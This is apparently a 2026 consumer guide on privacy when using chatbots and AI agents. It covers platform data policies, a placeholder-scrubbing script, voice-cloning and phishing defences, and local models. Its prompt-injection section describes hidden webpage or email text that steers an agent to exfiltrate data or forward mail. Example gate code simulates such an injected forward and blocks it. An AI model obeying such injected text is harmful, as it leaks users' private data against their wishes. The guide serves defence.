LLMs & AI Privacy: What Every User Should Know (2026)
How ChatGPT, Claude, Gemini, and AI voice tools handle your data — and the specific prompting habits, settings, and alternatives that reduce your exposure.
Methodology: Every product featured here was purchased with my own money and tested in my actual daily workflow. No sponsorships, no free review units.
AI tools have created a new threat surface most people don’t think about. Here’s what the major platforms actually do with your data — and how to use them without giving away more than you intend.
The short version
How AI platforms actually handle your data
The data policies of AI platforms are opaque by design — buried in terms of service most users never read. Here’s the practical reality.
What happens to your conversation after you close the tab
- Social Security numbers or government IDs
- Passwords, API keys, or authentication tokens
- Financial account numbers or card details
- Medical records or diagnoses
- Confidential client or business information
- Full names combined with addresses, phone numbers, or birthdates
The practical test: if this information appeared in a data breach, would it cause real harm? If yes, don’t paste it into a chatbot.
Prompt hygiene: using AI without oversharing
Most of the risk from AI tools isn’t malicious — it’s accidental oversharing. These habits keep you productive without giving platforms more than they need.
Use placeholders for sensitive details
Instead of: “My SSN is 123-45-6789, help me fill out this tax form.”
Try: “I’m filling out Form 1040 and need to enter a 9-digit identification number in Box 3. What format is expected?”
The AI doesn’t need your actual data to help you with the task.
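The placeholder habit above can be automated at the point where a prompt leaves your machine. The following is an example scrubber written for this guide (not a tool from OpenAI, Anthropic, Google, or any other platform named here): it replaces the categories listed earlier (SSNs, card numbers, API keys, e-mail addresses, phone numbers) with numbered tokens, keeps a local mapping so the model's answer can be rehydrated, and applies a Luhn check so a random 16-digit figure is not mistaken for a card. The regular expressions are deliberately simple, constructed patterns; a production scrubber would need broader coverage.

```python
"""Placeholder scrubber for prompts sent to a cloud LLM.

Example code written for this guide. Patterns below are constructed and
intentionally simple; they cover the categories the guide lists."""
import re
from typing import Callable, Dict, List, Tuple

# (kind, pattern) in the order they are applied. SSN runs before PHONE so a
# 9-digit SSN is never re-read as part of a phone number.
PATTERNS: List[Tuple[str, re.Pattern]] = [
    ("SSN",   re.compile(r"\b\d{3}-\d{2}-\d{4}\b")),
    ("CARD",  re.compile(r"\b\d(?:[ -]?\d){12,18}\b")),            # 13-19 digits
    ("KEY",   re.compile(r"\b(?:sk|AKIA|ghp)[A-Za-z0-9_-]{16,}\b")),  # common key prefixes
    ("EMAIL", re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.-]+\b")),
    ("PHONE", re.compile(r"\(?\b\d{3}\)?[ .-]?\d{3}[ .-]?\d{4}\b")),
]


def luhn_ok(candidate: str) -> bool:
    """True if the digits in `candidate` pass the Luhn checksum used by card numbers."""
    digits = [int(c) for c in candidate if c.isdigit()]
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def scrub(text: str) -> Tuple[str, Dict[str, str]]:
    """Replace sensitive values with tokens like [SSN_1].

    Returns the scrubbed text and a placeholder -> original mapping that stays
    on the local machine. Repeated values reuse the same token so the model can
    still see that two mentions refer to the same thing."""
    mapping: Dict[str, str] = {}
    counters: Dict[str, int] = {}

    def make_sub(kind: str) -> Callable[[re.Match], str]:
        def _sub(m: re.Match) -> str:
            value = m.group(0)
            if kind == "CARD" and not luhn_ok(value):
                return value    # long digit run that is not a card number: leave it
            for placeholder, original in mapping.items():
                if original == value:
                    return placeholder
            counters[kind] = counters.get(kind, 0) + 1
            placeholder = f"[{kind}_{counters[kind]}]"
            mapping[placeholder] = value
            return placeholder
        return _sub

    for kind, pattern in PATTERNS:
        text = pattern.sub(make_sub(kind), text)
    return text, mapping


def restore(text: str, mapping: Dict[str, str]) -> str:
    """Put the original values back into the model's reply (never into the prompt)."""
    for placeholder, original in mapping.items():
        text = text.replace(placeholder, original)
    return text


if __name__ == "__main__":
    # Constructed sample prompt; the values are not real.
    prompt = ("My SSN is 123-45-6789, card 4111 1111 1111 1111, "
              "key sk-live-abcdefghijklmnopqrstuv, reach me at jane@example.com "
              "or 555-123-4567. Help me fill out this form.")
    safe, table = scrub(prompt)
    print("SEND   :", safe)
    print("KEEP   :", table)
    print("RESTORE:", restore(safe, table) == prompt)
```

Only the scrubbed string goes to the platform; the mapping never leaves the machine. The Luhn check is what keeps an order number or timestamp from being swallowed as a card, which matters because over-scrubbing makes people disable the tool.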
Clear conversation history regularly
Most platforms let you delete individual conversations or your full history. Deleted conversations are typically removed from training pipelines, though they may remain in backup systems for a short retention window. Make deleting sensitive chats a routine.
Use work AI for work, personal AI for personal
Don’t paste your employer’s confidential code or documents into a personal ChatGPT or Claude account. If your company has an enterprise AI contract, use that — it comes with data processing agreements that personal accounts don’t have. When in doubt, ask your legal or IT team first.
Disable training opt-in on every platform
ChatGPT: Settings → Data Controls → toggle off “Improve the model for everyone.”
Gemini: myaccount.google.com → Data & Privacy → Gemini Apps Activity → toggle off.
Claude: Settings → Privacy → toggle off training use.
Takes 90 seconds per platform.
Platform data policies at a glance
| Platform | Trains on free tier? | Opt-out available? | Retention window | Enterprise zero-retention? |
|---|---|---|---|---|
| ChatGPT (OpenAI) | Yes (opt-out available) | Yes | 30 days after deletion | Yes (Enterprise) |
| Claude (Anthropic) | Yes (opt-out available) | Yes | Up to 2 years | Yes (Teams/Enterprise) |
| Gemini (Google) | Yes, via Google account activity | Yes | 18 months (default) | Yes (Workspace) |
| Copilot (Microsoft) | Depends on account type | Yes (via privacy dashboard) | Varies by product | Yes (M365 E3/E5) |
| Ollama (local) | No — runs entirely offline | N/A | No cloud retention | N/A |
Policies update frequently. Verify current terms on each platform’s privacy settings page before handling sensitive data.
The voice cloning threat you probably haven’t taken seriously
This is the AI privacy threat most people underestimate. Commercial voice cloning tools — available to anyone with a credit card — can produce convincing audio impersonations from as little as 3-10 seconds of source audio. That’s shorter than a typical voicemail greeting.
Where attackers source audio
Social media videos, YouTube, TikTok, LinkedIn media posts, voicemail greetings, podcast appearances, and conference recordings are all public audio sources.
Who gets targeted
Family members receive calls from a cloned voice claiming to be in an emergency. Executives’ voices are cloned for business email compromise. Financial institutions receive cloned voices attempting to bypass voice authentication.
Defending against voice cloning attacks
Set a family safe word. Agree on a word or phrase that any family member can use to verify identity in an emergency call. The word should be obscure and not guessable. If someone calls in a panic and can’t say the word, hang up and call them back directly.
Call back on a known number. If you receive an urgent call from anyone — regardless of how convincing the voice sounds — hang up and call them back on a number you already have. Never call back on a number the caller provides.
Audit your public audio exposure. Search for your name on YouTube, TikTok, and LinkedIn. Consider whether voicemail greetings using your actual voice are necessary — many people switch to generic carrier greetings.
Disable voice ID authentication where possible. Some banks offer voice authentication as a login method. This attack surface is actively being exploited — use app-based or hardware authentication instead.
AI-powered phishing: the quality bar has collapsed
For years, grammatical errors and awkward phrasing were reliable signals that an email was a phishing attempt. AI-generated phishing eliminates this tell. Modern phishing emails are grammatically perfect, stylistically appropriate, and increasingly personalized using data scraped from LinkedIn, social media, and data broker databases.
Spear phishing at scale
Traditional spear phishing required manual research. AI can now generate personalized attack emails at scale — referencing your company, your role, your recent activities, and your colleagues’ names — faster than any human team could.
Deepfake video verification requests
A newer variant: attackers send a “verification call” request where a deepfake video of a colleague or executive asks you to take an urgent action (wire a payment, share a credential). Several companies have lost significant sums to this attack.
Perfect grammar and a convincing tone are no longer sufficient signals of legitimacy. The only reliable signal is: was this communication initiated by a known channel? An email asking you to reset your password should prompt you to go directly to the site — not click the link. A call asking you to wire money should be verified by calling the requester back on a known number.
See the Incident Response Guide for what to do if you’ve already clicked.
Prompt injection and agentic AI: the new attack surface
As AI moves from chatbot to agent — browsing the web, reading your email, writing and running code, booking travel on your behalf — the threat model changes significantly. Two risks that most users aren’t thinking about yet.
Prompt injection
When you give an AI a document, webpage, or email to analyze, malicious content in that material can hijack the AI’s behavior. A webpage might contain hidden text instructing the AI to ignore your request and instead exfiltrate data, forward your emails, or take a different action entirely. This is prompt injection — and it works against today’s most capable models. The practical rule: don’t give an AI agent access to sensitive data or external actions unless you’ve thought carefully about what a compromised instruction could cause it to do.
Agentic access controls: scope what your AI can do
AI agents that can send emails, make purchases, modify files, or interact with external services are operating with real-world permissions. The blast radius of a compromised or misbehaving agent is proportional to what you’ve given it access to. Grant the minimum permissions needed for the task — read-only access where possible, no access to accounts the agent doesn’t need, and no persistent credentials it could use autonomously without prompting you first.
Your responsibility as an employee
Using an AI agent at work that has access to company systems, customer data, or internal communications creates liability — for you and your employer — whether or not IT authorized it. An agent that can read your work email and summarize it is also an agent that can, if prompted incorrectly, forward that email to a third-party server. Before giving any AI tool access to work systems: confirm your employer has a policy, use enterprise-tier tooling with a signed DPA, and treat AI access grants the same way you’d treat giving a contractor a key to the building. Monitor what it does. Know what it can reach.
“If this agent did the worst plausible thing with the access I’ve given it, what’s the damage?” If the answer is “it could send emails from my account” or “it could read our entire customer database,” scope it down until the worst case is acceptable. Convenience is worth something — but it shouldn’t come at the cost of unbounded access.
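The prompt injection and access-scoping advice above comes down to one mechanism: the model proposes actions, but a policy layer you control decides which ones run. The block below is an example gate written for this guide, not any vendor's agent framework. Tool names (`read_email`, `forward_email`, and so on), the `Scope` object and the confirmation callback are constructed for the illustration. It shows the "worst plausible thing" question as code: a summarization task gets a read-only scope, so a forward-to-external-address action (the kind an injected document can provoke) is refused before anything executes, and even a wider scope still requires an allowlisted destination plus explicit user confirmation for side effects.

```python
"""Least-privilege gate for an AI agent's proposed tool calls.

Example code written for this guide. Tool names, scopes and the simulated
agent output are constructed; this is not a real product's API."""
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Set
from urllib.parse import urlparse


@dataclass
class Action:
    tool: str               # e.g. "read_email", "forward_email", "http_get"
    args: Dict[str, str]


@dataclass
class Scope:
    """What one task may do. Default: nothing external, nothing side-effecting."""
    allowed_tools: Set[str]
    allowed_domains: Set[str] = field(default_factory=set)


# Tools that change state outside the agent; these always need a human yes.
SIDE_EFFECTS = {"send_email", "forward_email", "http_post", "write_file", "purchase"}


@dataclass
class Decision:
    allowed: bool
    reason: str


def destination_of(action: Action) -> str:
    """Extract the domain an action would reach, or "" if it reaches nothing."""
    target = action.args.get("url") or action.args.get("to") or ""
    host = urlparse(target).hostname
    if host:
        return host.lower()
    if "@" in target:                       # e-mail address
        return target.rpartition("@")[2].lower()
    return ""


def evaluate(action: Action, scope: Scope,
             confirm: Callable[[Action], bool]) -> Decision:
    """Decide whether one proposed action may run under `scope`.

    `confirm` is the human-in-the-loop hook; it is only called for side effects
    that already passed the tool and destination checks."""
    if action.tool not in scope.allowed_tools:
        return Decision(False, f"tool {action.tool!r} is outside the task scope")
    dest = destination_of(action)
    if dest and dest not in scope.allowed_domains:
        return Decision(False, f"destination {dest!r} is not allowlisted")
    if action.tool in SIDE_EFFECTS and not confirm(action):
        return Decision(False, "side-effecting action declined by user")
    return Decision(True, "ok")


def run_task(proposed: List[Action], scope: Scope,
             confirm: Callable[[Action], bool]) -> List[str]:
    """Gate every proposed action; return an audit log (executing is stubbed)."""
    log = []
    for action in proposed:
        d = evaluate(action, scope, confirm)
        verdict = "ALLOW" if d.allowed else "DENY "
        log.append(f"{verdict} {action.tool} {action.args} ({d.reason})")
    return log


if __name__ == "__main__":
    # Constructed: what a model might propose after reading an inbox that
    # contained an injected instruction. The first action is the real task;
    # the second is not something the user asked for.
    proposed = [
        Action("read_email", {"folder": "inbox", "limit": "50"}),
        Action("forward_email", {"thread": "42", "to": "collector@example.net"}),
    ]
    summarize_only = Scope(allowed_tools={"read_email"})
    for line in run_task(proposed, summarize_only, confirm=lambda a: False):
        print(line)
```

The audit log is the other half of the guide's advice ("Monitor what it does"): every refusal is recorded with the reason, so a pattern of denied forwards or external posts is visible even when nothing was harmed.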
Safer alternatives for sensitive work
Ollama (local models)
Ollama is free, open-source software that lets you run LLMs like Llama 3, Mistral, or Phi-3 entirely on your own hardware. Nothing leaves your machine. For any query involving real personal data, proprietary code, or sensitive business context, this is the zero-risk option. A modern laptop with 16GB RAM handles most models well.
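"Nothing leaves your machine" is only true if the client really talks to the local endpoint, so it is worth making that a hard rule rather than a configuration default. The following client is an example written for this guide (not Ollama's own code): it posts to Ollama's local HTTP API (`/api/chat` on the default port 11434) and refuses, before any connection is made, to send a prompt anywhere but a loopback address. The model tag `llama3` is assumed to be one you have already pulled.

```python
"""Loopback-only client for a locally running Ollama instance.

Example code written for this guide. Assumes Ollama is serving on its default
port 11434 and that the model tag given (default "llama3") has been pulled."""
import ipaddress
import json
import urllib.request
from typing import Any, Dict
from urllib.parse import urlparse

OLLAMA_URL = "http://127.0.0.1:11434/api/chat"


def is_local_endpoint(url: str) -> bool:
    """True only for loopback targets. Any other DNS name is refused, because a
    name could resolve off-box and the guard would silently stop being true."""
    host = urlparse(url).hostname
    if host is None:
        return False
    if host == "localhost":
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return False


def build_request(model: str, prompt: str) -> Dict[str, Any]:
    """Body for Ollama's /api/chat endpoint; stream=False returns one JSON object."""
    return {
        "model": model,
        "messages": [{"role": "user", "content": prompt}],
        "stream": False,
    }


def ask_local(prompt: str, model: str = "llama3",
              url: str = OLLAMA_URL, timeout: float = 120.0) -> str:
    """Send a prompt to the local model and return the assistant's reply text."""
    if not is_local_endpoint(url):
        raise ValueError(f"refusing to send prompt to non-loopback endpoint {url!r}")
    body = json.dumps(build_request(model, prompt)).encode("utf-8")
    req = urllib.request.Request(
        url, data=body, headers={"Content-Type": "application/json"}, method="POST"
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.load(resp)["message"]["content"]


if __name__ == "__main__":
    # Runs only when a local Ollama daemon is up; the prompt stays on this box.
    print(ask_local("In one sentence, what is a data processing agreement?"))
```

Because the check is on the literal URL rather than on a resolved address, pointing the client at a cloud endpoint fails loudly instead of quietly sending data out. That is the behaviour you want from a tool chosen specifically because it is offline.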
Enterprise AI tiers
ChatGPT Enterprise, Claude for Work (Teams/Enterprise), and Google Gemini for Workspace all come with signed data processing agreements that exclude your data from model training and offer stronger retention controls. If you’re using AI for professional work, this is the appropriate tier — often available through your employer.
AI privacy action plan
Your AI privacy setup
📚 Citing This Guide
When referencing this content, please cite: "LLMs & AI Privacy: What Every User Should Know (2026)" by jason.guide